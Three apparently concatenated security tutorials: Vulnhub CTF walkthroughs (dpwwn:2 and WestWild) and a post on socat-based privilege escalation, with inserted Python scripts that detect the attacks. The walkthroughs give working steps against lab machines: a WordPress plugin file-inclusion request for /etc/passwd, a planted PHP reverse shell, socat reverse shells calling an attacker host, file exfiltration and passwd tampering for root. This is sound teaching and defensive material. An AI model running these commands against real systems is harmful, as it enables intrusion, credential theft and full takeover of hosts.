dpwwn:2 Vulnhub Walkthrough


Today we will take on another CTF challenge, dpwwn2, from the dpwwn series. Credit for making this VM goes to “Debashish Pal”. It is a boot2root challenge in which we have to root the machine and capture the flag dpwwn-02-FLAG.txt to complete it. You can download this VM here.
Security Level: Intermediate
Penetrating Methodology:
Scanning
·         Nmap
Enumeration
·         Dirb
·         WPScan
·         Searchsploit
Exploitation
·         Netcat
Privilege Escalation
·         Exploiting SUID rights

Walkthrough:

Scanning:
Let’s start off with the scanning process. The target VM has a static IP of 10.10.10.10 by default, so we put our Kali machine on the same network.
Then we used Nmap for port scanning and found ports 80, 443 and 2049 open.
nmap -A 10.10.10.10


Enumeration:
Since port 80 is open, we browsed to it and got nothing more than a welcome message.


Our next step, as usual, was to look for directories, which we did with the directory brute-forcing tool dirb. We found a directory named wordpress, which suggests the target is hosting a WordPress site.
dirb http://10.10.10.10/


We browsed to the URL found above and, as expected, there was a WordPress site. But we couldn’t find much on the website itself.


So we used WPScan (a WordPress vulnerability scanner) to look for vulnerabilities in the site, enumerating its plugins.
wpscan --url http://10.10.10.10/wordpress -e p


The results showed no vulnerability in the WordPress version or the installed themes, but there was one in a plugin: Site Editor 1.1.1 is vulnerable to Local File Inclusion (LFI).


We looked for a public exploit in the Searchsploit database and found one.
We copied the exploit into our root directory.
searchsploit site editor 1.1.1
searchsploit -m 44340



Looking inside the exploit file, the proof-of-concept section clearly shows how to trigger the LFI.


Exploitation:
To run the exploit against our target, we simply replaced the host with the target address and used curl to fetch the result.
We were able to fetch the contents of /etc/passwd, which confirmed that the site is indeed vulnerable to LFI.
curl "http://10.10.10.10/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"


So far we have a target that is vulnerable to LFI. If we can somehow plant a reverse shell on the target system, we can execute it through the LFI.
Recall from the nmap scan that the Network File System (NFS) service is running on port 2049; it is used to share directories over the network.
We looked for exported directories and found one, /home/dpwwn02.
We mounted this export on a newly created directory, /tmp/raj.
showmount -e 10.10.10.10
cd /tmp
mkdir raj
mount -t nfs 10.10.10.10:/home/dpwwn02 raj
cd /tmp/raj
ls


Meanwhile we grabbed a PHP reverse shell from /usr/share/webshells/php, changed the listener IP to ours and saved it as shell.php.


Then we copied it into /tmp/raj, which is mounted from the target’s /home/dpwwn02 directory, so shell.php now sits in the exported directory.
cp /root/shell.php /tmp/raj/
ls


To execute the reverse shell through the browser, we replaced /etc/passwd with the location of the shell.php file, i.e. /home/dpwwn02/shell.php. At the same time we started a netcat listener on our Kali machine.
http://10.10.10.10/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/home/dpwwn02/shell.php



Within a few seconds we got a reverse shell in netcat with limited user privileges. It was time to find a way to a root shell. We looked for binaries with the SUID bit set and found that the find binary runs with root privileges.
nc -lvp 1234
find / -perm -u=s -type f 2>/dev/null
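From the defender’s side, the requests above leave a clear trace in the web server’s access log. The following script is an added example, not part of the original walkthrough, that flags requests to the vulnerable ajax_shortcode_pattern.php endpoint whose ajax_path is an absolute path or a traversal sequence; the log lines, client IP and timestamps are constructed.

```python
"""Flag LFI attempts against the Site Editor endpoint in combined-format access logs.
Added example for this walkthrough; all log lines below are constructed."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint and parameter named in the walkthrough. A legitimate ajax_path is a short
# relative pattern name; an absolute path or traversal sequence is an inclusion attempt.
ENDPOINT = "/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
PLUGIN = "/wordpress/wp-content/plugins" + ENDPOINT

SAMPLE_LOG = [  # constructed
    '10.10.10.1 - - [22/Sep/2019:10:01:02 +0000] "GET /wordpress/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    f'10.10.10.1 - - [22/Sep/2019:10:01:09 +0000] "GET {PLUGIN}?ajax_path=patterns/hero.php HTTP/1.1" 200 311 "-" "Mozilla/5.0"',
    f'10.10.10.1 - - [22/Sep/2019:10:02:40 +0000] "GET {PLUGIN}?ajax_path=/etc/passwd HTTP/1.1" 200 1604 "-" "curl/7.65.0"',
    f'10.10.10.1 - - [22/Sep/2019:10:05:13 +0000] "GET {PLUGIN}?ajax_path=/home/dpwwn02/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    f'10.10.10.1 - - [22/Sep/2019:10:06:00 +0000] "GET {PLUGIN}?ajax_path=..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 500 0 "-" "curl/7.65.0"',
]

def is_suspicious_path(value):
    """Decide on an already URL-decoded value; decode once more to catch double encoding."""
    v = unquote(value).replace("\\", "/")
    return v.startswith("/") or "../" in v or "\x00" in v

def detect_lfi(lines):
    """Return (client ip, status, decoded ajax_path) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("url"))
        if not parts.path.endswith(ENDPOINT):
            continue
        for value in parse_qs(parts.query).get("ajax_path", []):  # decodes one layer
            if is_suspicious_path(value):
                findings.append((m.group("ip"), int(m.group("status")), unquote(value)))
    return findings

if __name__ == "__main__":
    for ip, status, path in detect_lfi(SAMPLE_LOG):
        print(f"{ip} status={status} ajax_path={path}")
```

A 200 response to an absolute ajax_path is the strongest signal: the plugin served the file, as it did for /etc/passwd above.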


Privilege Escalation:
There are multiple ways to take advantage of the SUID permission on the find binary for privilege escalation. We used it to give the wget binary the SUID permission, which lets us download a tampered passwd file into the target’s /etc folder, something that is otherwise not permitted.
We first copied the contents of /etc/passwd to our Kali system.
which wget
find /home -exec chmod u+s /usr/bin/wget \;
ls -la /usr/bin/wget
cat /etc/passwd


Then we created a password hash using openssl.
openssl passwd -1 -salt user3 pass123


In the passwd file copied from the target, we added a new user raj with the password pass123 and gave it root privileges.
nano passwd


After that we started a Python one-liner HTTP server on our Kali system.


On the target machine we downloaded the tampered passwd file into the /etc folder. This file has a new user raj with root privileges, so all we had to do was switch to this new user and read the root flag dpwwn-02-FLAG.txt.
su raj
cd /root
ls
cat dpwwn-02-FLAG.txt
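For defenders, this escalation leaves two durable artefacts on the host: a binary that gained the SUID bit and a passwd entry carrying its own hash with UID 0. The script below is an added example, not part of the walkthrough, that audits both; the passwd content, the hash placeholder and the SUID inventories are constructed.

```python
"""Audit for the two traces this escalation leaves behind: an /etc/passwd entry that
carries its own hash and UID 0, and a binary that gained the SUID bit. Added example."""

# Constructed passwd content. The raj line mirrors the tampering described above, with a
# placeholder in the field where the output of `openssl passwd -1` would be pasted.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
dpwwn02:x:1000:1000::/home/dpwwn02:/bin/bash
raj:$1$user3$PLACEHOLDERHASH000000:0:0::/root:/bin/bash
"""
# Constructed SUID inventories: an approved baseline and what `find / -perm -u=s` returned.
BASELINE_SUID = {"/usr/bin/passwd", "/usr/bin/su", "/usr/bin/sudo", "/bin/mount", "/bin/umount"}
CURRENT_SUID = BASELINE_SUID | {"/usr/bin/find", "/usr/bin/wget"}

def audit_passwd(text):
    """Return (severity, message) findings for passwd-format text."""
    findings, owner_of_uid = [], {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(("HIGH", f"line {lineno}: malformed entry"))
            continue
        name, pw, uid = fields[:3]
        if not uid.isdigit():
            findings.append(("HIGH", f"{name}: non-numeric uid {uid!r}"))
            continue
        if pw not in ("x", "*", "!", "!!"):
            # login honours a hash placed here, so the entry bypasses /etc/shadow entirely
            findings.append(("HIGH", f"{name}: password hash stored in passwd, not shadow"))
        if uid == "0" and name != "root":
            findings.append(("HIGH", f"{name}: uid 0 account other than root"))
        if uid in owner_of_uid:
            findings.append(("MEDIUM", f"{name}: shares uid {uid} with {owner_of_uid[uid]}"))
        owner_of_uid.setdefault(uid, name)
    return findings

def new_suid_binaries(baseline, current):
    """SUID paths present now but absent from the approved baseline."""
    return sorted(set(current) - set(baseline))

if __name__ == "__main__":
    for severity, message in audit_passwd(SAMPLE_PASSWD):
        print(severity, message)
    print("unexpected SUID binaries:", new_suid_binaries(BASELINE_SUID, CURRENT_SUID))
```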

Linux For Pentester: socat Privilege Escalation


Welcome back to another command in the “Linux for pentester” series. As we know, there are many tools that can help a user transfer data. Here we take advantage of another such command, “socat”, a utility for data transfer between two addresses, and use it in our mission of privilege escalation.

NOTE: “The main objective of publishing the “Linux for pentester” series is to introduce the circumstances and the kinds of hurdles a pentester can face while solving CTF challenges or OSCP labs based on Linux privilege escalation. We are not criticizing any misconfiguration that a network or system administrator makes when granting higher permissions on programs, binaries, files, etc.”

Table of content
Overview to socat
·         What is socat
·         Basic parameters of socat
·         Operation achieved by socat

Abusing socat

·         SUDO Lab setups for privilege Escalation
·         Exploiting SUDO

What is socat

Socat is a network utility similar to netcat; it supports IPv6 and SSL and is available for both Windows and Linux. The first thing you will notice is that its syntax differs from netcat and other standard Unix tools.
In other words, it is a command-line utility that establishes two bidirectional byte streams and transfers data between them. The streams can be built from a large set of data sinks and address types.
It is a utility for data transfer between two addresses and uses the syntax “socat [options] <address> <address>”.
Let’s start working with this powerful tool by looking at its help output.

socat -h


Basic parameters of socat
The most “basic” socat invocation would be: socat [options] <address> <address>
A more interesting example would be: socat -d -d - TCP4:www.example.com:80


Here “-d -d” are the options, “-” is the first address and TCP4:www.example.com:80 is the second address.

The syntax becomes clearer if we break each component down a bit. Let’s start with the address, since the address is the key concept in socat.

Addresses:
Socat always works with two addresses, so it is important to understand what addresses are and how they work. An address is something the user provides on the command line. Invoking socat without any addresses results in the error shown below:
~: socat
2018/09/22 19:12:30 socat[15505] E exactly 2 addresses required (there are 0); use option "-h" for help

Type:
After the address, the other component of socat is the “type”, which specifies the kind of address we need. Some popular choices are TCP4, CREATE, EXEC, STDIN, STDOUT, PIPE and UDP4, whose names are fairly self-explanatory.

Certain address types also have aliases. “-” is one such alias and stands for STDIO. Another alias is TCP, which stands for TCP4. The man page lists all other aliases.

Parameters:
Immediately after the type come zero or more required address parameters, separated by colons.
The number of address parameters depends on the address type. The address type TCP4 requires a server description and a port description.

Operation achieved by socat

To send and receive text messages bidirectionally: As we know, socat establishes two bidirectional byte streams and transfers data between them. Now I will establish a connection between two machines and transfer messages between them.
For this we need to start a listener on one machine. In the image below we have done this on “kali”, which acts as the listener and is ready to receive whatever is sent by “ubuntu”, using the command:

socat - TCP4-LISTEN:4444


After running the listener, our next step is to use socat on the other machine, i.e. “ubuntu”. Here we need to specify the IP and port of the machine on which the listener was started.

socat - TCP4:192.168.1.106:4444

Now we have succeeded in sharing text between both terminals, as shown in the image below.



EXEC command using socat to take a shell: socat can also give the user a shell on another machine. Here I wish to take a shell of “ubuntu” on the “kali” terminal using the “EXEC” type.

socat TCP4-LISTEN:1234,reuseaddr EXEC:/bin/sh



With the above command a listener is running on “ubuntu”; now we use socat on “kali”, specifying the IP and port of the ubuntu machine, which gives us a shell of ubuntu on kali.

socat - TCP4:192.168.1.100:1234

To check whether you have got a shell on the desired machine, simply run “id”. As the image below shows, we are user “raj”, a user of “ubuntu”, which means we have successfully got the shell.

id
whoami
ifconfig


EXEC command using socat to transfer a file: Now we use another function of “EXEC” to transfer a file. Here I want to transfer the “passwd” file from “ubuntu” to “kali”, following the same process.

socat TCP4-LISTEN:1234,reuseaddr EXEC:"cat /etc/passwd"


socat - TCP4:192.168.1.100:1234

When we switch to kali and run the socat command, it shows us the “passwd” file of the source machine.


Working with socat using other types: As we know, socat supports a list of “types” such as CREATE, EXEC, STDIN, STDOUT, PIPE etc.
In the image below I have a text file named “test”, and I want the listener machine to receive it.

cat test
cat test | socat - TCP4:192.168.1.100:4444

With the above command I first output the “test” file with cat and then pipe that output into socat as its input.



As the image below shows, I used the “OPEN” type to create a file named “raj” and append the content of the “test” file to this newly created file.

So when I run the listener on “ubuntu”, it writes the content of “test” into the “raj” file as desired.

socat TCP4-LISTEN:4444,reuseaddr OPEN:raj,creat,append
cat raj


Abusing socat

Sudo Rights Lab setups for Privilege Escalation
Now we start our mission of privilege escalation. As with the other commands in the “Linux for pentester” series, we first need to set up our lab so that the “socat” command runs with administrative rights.
In the image below I have granted a sudo rule to the local user (test), who can now run “socat” as root.
To add the sudo right, open the /etc/sudoers file and add the following line under the user privilege specification.

test ALL=(root) NOPASSWD: /usr/bin/socat
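The sudoers line above is exactly what a defender’s configuration review should catch. The script below is an added example, not from the original post, that parses user-specification lines and flags rules granting ALL or a binary that can execute arbitrary commands (socat and find, the two shown in these posts); the sample sudoers text is constructed.

```python
"""Audit sudoers user-specification lines for rules that hand out a root shell.
Added example; SAMPLE_SUDOERS is constructed, not taken from any real host."""
import re

# Binaries these posts show spawning a root shell under sudo (socat EXEC:/bin/sh, find -exec);
# extend the set with any other binary that can execute arbitrary commands.
SHELL_CAPABLE = {"socat", "find"}

RULE_RE = re.compile(r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
                     r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
test ALL=(root) NOPASSWD: /usr/bin/socat
svc ALL=(root) NOPASSWD: /usr/sbin/service nginx restart   # deploy hook
ops ALL=(ALL:ALL) ALL
"""

def parse_sudoers(text):
    """Return (who, runas, tags, [commands]) for every user-specification line."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "@")) or "_Alias" in line:
            continue
        m = RULE_RE.match(line)
        if m:
            cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
            rules.append((m.group("who"), m.group("runas") or "root", m.group("tags"), cmds))
    return rules

def audit_sudoers(text):
    """Return (who, runas, command, reason) for each rule worth a reviewer's attention."""
    findings = []
    for who, runas, tags, cmds in parse_sudoers(text):
        if who == "root":
            continue
        for cmd in cmds:
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                reason = "may run any command"
            elif binary in SHELL_CAPABLE:
                reason = f"{binary} can execute arbitrary commands"
            else:
                continue
            if "NOPASSWD" in tags:
                reason += " without a password"
            findings.append((who, runas, cmd, reason))
    return findings
```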


Exploiting Sudo rights

First Method:
Now we exploit the socat facility by abusing the sudoer’s permission. For this we first need a session on the victim’s machine.

So we connect to the target machine with ssh; type the following command to log in as the local user.

Then we check the sudo rights for the “test” user (if any) and find that “test” can execute socat as “root” without a password.
sudo -l
Since “test” has these sudo privileges, we try to obtain a root shell on the host by using socat with the EXEC option.

sudo socat TCP4-LISTEN:1234,reuseaddr EXEC:"/bin/sh"



In a new terminal run socat against the source IP and port used above to obtain a reverse shell of the host machine.

socat - TCP4:192.168.1.100:1234

Now we have successfully got a shell on the victim’s machine with root privileges, as shown in the screenshot below.


Second Method:

There is another method to obtain a higher-privileged shell, using a socat one-liner reverse shell command.

sudo socat exec:'sh -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.106:1234



In a new terminal start socat as a listener and obtain a root shell of the remote machine.

socat file:`tty`,raw,echo=0 tcp-listen:1234

Conclusion: In this way we can make use of the “socat” command to escalate privileges on a remote machine.

WestWild: 1.1: Vulnhub Walkthrough

Today we are going to take on a new CTF challenge, WestWild. Credit for making this VM goes to “Hashim Alsharef”. It is a boot2root challenge in which we have to root the server and capture the flag to complete it. You can download this VM here.
Security Level: Intermediate
Penetrating Methodology:
1.      Scanning
·         NMAP
2.      Enumeration
·         Enum4Linux
·         Smbclient
3.      Exploitation
·         SSH
4.      Privilege Escalation
·         Exploiting Sudo rights

Walkthrough:

Scanning:
Let’s start off with the scanning process. The target VM obtained the IP address 192.168.1.104 automatically from our local Wi-Fi network.
Then we used Nmap for port enumeration and found ports 22, 80, 139 and 445 open.

nmap -A 192.168.1.104



Enumeration:
We saw that port 445 (SMB) is open, which means there may be a shared directory, so to enumerate it along with the other ports we used the Enum4Linux tool. The results gave us some user details and a shared directory named wave.
enum4linux -a 192.168.1.104


To confirm the shared directory we used smbclient with a blank password; we got lucky and were able to list the shares.
Inside the wave share we found two text files, FLAG1.txt and message_from_aveng.txt, which we downloaded to our Kali system with the get command.
smbclient -L //192.168.1.104 -N
smbclient //192.168.1.104/wave -N
ls
get FLAG1.txt
get message_from_aveng.txt


We looked into the contents of these text files and found a base64-encoded string in FLAG1.txt. Decoding it gave us the username wavex and the password door+open.

cat FLAG1.txt
cat message_from_aveng.txt



Exploitation:
With a username and password in hand, we tried to SSH into the target system and logged in successfully.
Now our job was to get a root shell. While looking around we found a writable directory, westsidesecret, and inside it a script named ififorget.sh.
The script contained one more set of credentials: aveng:kaizen+80.
find / -writable -type d 2>/dev/null
cd /usr/share/av/westsidesecret
ls
cat ififorget.sh

Privilege Escalation:
We switched to the user aveng with su and entered the password. To get to the root shell we checked the sudo permissions and found that this user can run all commands as root.
So we switched to a root shell with sudo su and finally read the root flag.
su aveng
sudo -l
sudo su
cd /root
cat FLAG2.txt